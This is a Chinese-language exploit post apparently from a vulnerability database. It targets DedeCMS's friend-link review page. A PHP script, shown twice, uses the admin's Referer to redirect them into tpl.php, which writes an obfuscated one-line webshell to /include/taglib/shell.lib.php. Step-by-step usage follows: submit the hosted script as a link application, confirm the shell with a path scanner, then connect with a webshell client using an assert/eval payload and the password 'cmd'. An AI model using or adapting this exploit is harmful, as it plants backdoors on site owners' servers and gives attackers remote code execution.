dedeCMS友情链接getshell漏洞

发表于 2017年01月15日
Vulndb

<?php
//print_r($_SERVER);
$referer = $_SERVER['HTTP_REFERER'];
$dede_login = str_replace("friendlink_main.php","",$referer);//去掉friendlink_main.php，取得dede后台的路径
//拼接 exp
$muma = '<'.'?'.'p'.'h'.'p'.' '.'p'.'h'.'p'.'i'.'n'.'f'.'o'.'('.')'.';'.'?'.'>'.'<'.'?'.'p'.'h'.'p'.' '.'e'.'x'.'t'.'r'.'a'.'c'.'t'.'('.'$'.'_'.'G'.'E'.'T'.')'.'.'.'$'.'a'.'('.'$'.'b'.'['.'0'.']'.')'.';'.'?'.'>';
$exp = 'tpl.php?action=savetagfile&actiondo=addnewtag&content='. $muma .'&filename=shell.lib.php';
$url = $dede_login.$exp;
//echo $url;
header("location: ".$url);
// send mail coder
exit();
?>

<?php

//print_r($_SERVER);

$referer = $_SERVER['HTTP_REFERER'];

$dede_login = str_replace("friendlink_main.php","",$referer);//去掉friendlink_main.php，取得dede后台的路径

//拼接 exp

$muma = '<'.'?'.'p'.'h'.'p'.' '.'p'.'h'.'p'.'i'.'n'.'f'.'o'.'('.')'.';'.'?'.'>'.'<'.'?'.'p'.'h'.'p'.' '.'e'.'x'.'t'.'r'.'a'.'c'.'t'.'('.'$'.'_'.'G'.'E'.'T'.')'.'.'.'$'.'a'.'('.'$'.'b'.'['.'0'.']'.')'.';'.'?'.'>';

$exp = 'tpl.php?action=savetagfile&actiondo=addnewtag&content='. $muma .'&filename=shell.lib.php';

$url = $dede_login.$exp;

//echo $url;

header("location: ".$url);

// send mail coder

exit();

使用

代码存为PHP文件，上传到你的空间。去提前友连申请，网址填写你上传后的地址。

站长审核后台友情连接时会生成一句话地址为/include/taglib/shell.lib.php
御剑字典添加/include/taglib/shell.lib.php测试是否存活即可
最后菜刀访问传参一句话http://site.com/include/taglib/shell.lib.php?a=assert&b[0]=@eval($_POST[cmd]);
密码为cmd